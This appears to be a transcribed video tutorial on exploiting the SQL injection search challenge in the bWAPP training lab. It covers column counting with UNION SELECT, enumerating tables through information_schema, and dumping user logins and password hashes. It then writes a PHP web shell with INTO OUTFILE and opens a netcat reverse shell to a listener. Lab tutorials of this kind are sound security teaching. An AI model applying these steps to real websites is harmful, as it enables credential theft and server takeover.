Welcome back to a new video. In this video, we're going to be talking about SQL injection get search in bWAPP. Basically, this scenario where you have a search box, and when you type something in that search box, a SQL query is executed in the backend. And that's what's happening here. So we have a table title that contains title, release, character, genre, IMDb. Seems like a movie table, right? So basically here, what we want to do as per the bAPP requirements, we need to find an exploitation method for the search box over here, which is operated by SQL database. So that's the kind of scenario, guys, where you go to any website and you find a search box like this one. And when you type search, for example, we type something like hi, nothing in there, man. So as you can see, when I typed man, a couple of entries have been returned. As you can see, we have the title, release of the movie, the character, general IMDb. So when I see that in any website, right, I can form a solid decision about what is going on behind the search box, right? So I have a database and a table which contains these columns, right? And whenever I search for something, my SQL query is formed and is executed back in the database. So this is the kind of SQL injection get search, right? So in any SQL injection, in any scenario, or in any SQL injection testing, we always try to break the logic of the database. So basically, we try something like, the first thing we try is the single quote, right, to break the logic of any database. So I try that, search. Now, based on the output that has been returned by the page, it's saying you have an error in your SQL syntax. Check the manual that corresponds to your MariaDB server version for the right syntax to use near the percent at line 1. So based on the output we got, we have a Maria database, right? And we have a SQL injection vulnerability. Why? Because when you have an error that is returned from the database back into the web page, we can say that there is SQL injection vulnerability in response to the single quote we have typed. So in order to start exploiting the scenario, let's go to our editor. And from here, we can start learning, or here, let's move that this way. Okay. So from here, let's try to imagine what's happening behind, what's happening in the database whenever we type something over here. So basically, as you can see, let's go back, type man. So we have title, release, character, genre, IMDb, right? These are the columns. And the SQL query looks like this. Select title, we have release, and we have character, genre, IMDb. These are the basic columns of the table, right? Now, as you can see here, when we type something, this SQL query, guys, okay, from here we type the name of the table. So here it's likely movies table. So we type movies, where title, like, I will tell you what it's like. And here we type the percentage, and let's say, then we have get title. And we close it. So if we got something, I think over here, we need to type the single quote. and we close the put double quote here and double quote over there. I said there, here. Okay. So when we type something like man, this query is executed, right? So select title, release, character, general ID from movies where title like. Now like is an operator where it searches for specific patterns in the input of the user. So the patterns is something that is denoted by the percentage. The percentage over here denotes could denote something like character, 0 or 1. So when I say only the ampersand, zero the percentage, I mean 0, 1, or characters. So when I say like man here, the SQL query here in this case means search for any string that starts with man. If I type man over here, it's going to search for any string that ends with man. If I type percentage and here man and then we type percentage, it means it's going to search for man in any string, right? And now what is happening over here, guys? This is the thing that is executed. Now what if we ended this and we type code? Now we type code, we get an error, right? Why? Because the MariaDB here is vulnerable to SQL injection. So how can we get this further? In any scenario where we have a search box and the search box returns entries of a database, what we need to know first for the exploitation to succeed, we need to find out how many columns we have in this database. So apparently we have 1, 2, 3, 4, 5, right? Let's try it out. If we do receive an error, it means the columns aren't 5. If we didn't receive an error, it means that the columns are really 5. So what we can do over here, we can type man, we can type select 1, 1, 1, 3, 4, 5, right? Like this one. And we execute, saying the use select statements have a different number of columns, which means we have more columns than 5. So what we do here, guys, is we increase by 1. And we try the same. Increase by 1. You increase all the way till you be presented with no error, right? So search. So when I typed here 7 once, as you can see here, we haven't received any error, right? Which means we have 7 columns, which is the first thing, guys, in the exploitation phase. Okay. Now the next thing I want to know, what is the database running, the version? So if we type database here, database, so the database name is bWAPP. So we put a note here, database name bWAPP. Now the next thing here, let's type our operator. This is what we are using right now. So I want to know the version, right? So we type something like version. Let's try it. So we have an error here, right? So maybe we have typed something wrong. Let's go back. Version. I guess we need to cancel. Oh, no, wait. Let's delete that. And let's put here 1 and cancel the parentheses. So the version is 10.1.23 MariaDB. Now what we can do here, we can take the version and use search exploit to find a possible exploit for this version. Let's go back and let's try to find out the table name or something like the table name, right? So let's paste this another time, and let's see my manual over here. In my manual, let me grab, let's see the manual of SQL. Union select table name. Let's grab that from information schema. So here we put table name and let's take that. Let's try execute that. So guys, we see the table names in this database, bWAPP. We have blog, heroes, movies, users. So we are interested in finding the columns of this table, right? So let's go back and modify our entry. Let's paste the same, or let's go back and find the column names. So this is the formula. Let's take it, paste it, paste it here. Okay. So man, let's take that. Man union select column name from information schema.columns where table name equal, in this case, it's gonna be users. And we put that, and let's find out the columns in this table. Unknown column. Let's go back. Users. So we get the same. So basically our mistake, you didn't select column name. Okay, we forgot something, which is the ones. 1, 2, 3, 4, 5, 6, 7. 3, 4, 5, 6, 7. Okay, let's try that. Oh, the same. Let's go back. Column name, union select from information schema dot columns where table name equal users. Okay, great. So now we get the columns, right, that are existed in the table user. So we have login, password, email, secret. So let's dump these columns and find out the login and the password of each. That's what we're interested at, right? So let's enter and have this as it is. Copy it back. And over here, let's modify some stuff. So instead of column name, we type login and we type password. What else you want? Email. Secret. In this case, these columns are part of the table users, right? From here, we need to modify that. Can I cancel all of that? From table users. Now we know the name of the table. We don't have to repeat the same stuff over and over again. Copy. Okay. So we have here the title. As you can see, username. This is my username. The password hash, the character, the genre. So what we can do here, guys, we can take the hashes, use John the Ripper to crack the password. But since this is an offline work, let's try now to do something more mean, right? Let's try to execute that and convert it into a reverse shell. So to fire up our listener and see collapse. Okay, sudo, let's zoom in a bit. Zoom in, zoom. Sudo and see LTP for 5. Rolling. Oh, NC. Now we are listening. Okay. Now what we can do here, let me go back to my manual. This one, no, the other one. So we have a way to, where was it? Okay, let's copy that. We're going to create a reverse shell using SQL. We're going to convert SQL to reverse shell. Let's paste it. Okay. All right, so here, let's take that. Whatever, this one. Paste. Okay, now one, let's grab that. All of it, I guess. All the way till here. Instead of the login and the password, let's put everything back. One. And here, put one. Okay. Now, instead of from users, what we're going to do here, we're going to type this one into file. I'm going to explain to you what we are doing here. From users, paste. Okay. So I forgot this. Let's type it. So what we're doing here, guys, we are inserting, or we are saying that this PHP execution, right, which contains the CMD parameter, will be output to the the PHP file, which will take the CMD parameter to execute system commands. Right. So let's take it and see if we can get any luck with that. Yep. So given MySQL line number is parameter one to be MySQL result, boolean given. What's that? No entries were found. Let's go back, var HTML. Okay, now I think if we go to this, let's try to go to navigate to that file. Okay, take that. Shell php cmd equal who am I? Not found. Seems like I haven't created the file. Okay, so here we have 1, 2, 3, 4, 5, 6, 7 into our file var. Let's go to the machine and make sure the file has been created, or what's the problem? So root password. So if we search for shell, I don't think we have such entry, or the file hasn't been created for some reason. Okay, let's go back and try to understand what it's trying to tell us. MySQL line num rows expects parameter 1 to be MySQL result, boolean given in. It Seems like there's a problem in the source file. So what's the source file? SQL1.php. Nano. The file. Where's the file? Where's the file? Okay. Oh, open the new file. So if we search for MySQL num, there is nothing. Let's go back. MySQL I, okay. MySQL I num. So we got here MySQL I num rows, and here it's saying MySQL I num rows expect one parameter to MySQL result. Okay, seems that's not the entry we're looking for. This is the only occurrence. MySQL I num results. Okay, so let's go up and find the relevant SQL I result. There is no such entry. Let's go back to MySQL num. Record set MySQL I fetch array. So I think the error is here. MySQL I result. Okay. Let's try again. File, okay. Right now it has been executed. Great, so the file has been created. Let's go now to the file. Okay, now let's type cmd equal my. So we get, as you can see, guys, the code has been executed and we have returned the web server user. We can do here, we can convert that to the reverse shell and the listener we have established. So we type netcut 192.168.1.7. What's the port we're listening to? The port goes for 545 dash E bin bash. Okay. So as you can see, guys, we stepped from SQL injection into complete reverse shell. ID my sudo dash L. Oh, nothing. Okay. Go to home. Okay. So basically, guys, we have escalated from SQL injection into reverse shell in this tutorial. So let's go back, and most importantly, guys, when you test for SQL injection in a search box, which is supposed to return a table of entries, your first step is to guess the number of columns. And once you guess the number of columns, you insert the required parameters that are necessary to exploit the SQL injection, with the table name, column name, and you select the login and passwords, and you try to execute PHPs or create a PHP file that executes reverse shell. In this case, it's like what we have done. All right, that's it, and see you in the next video.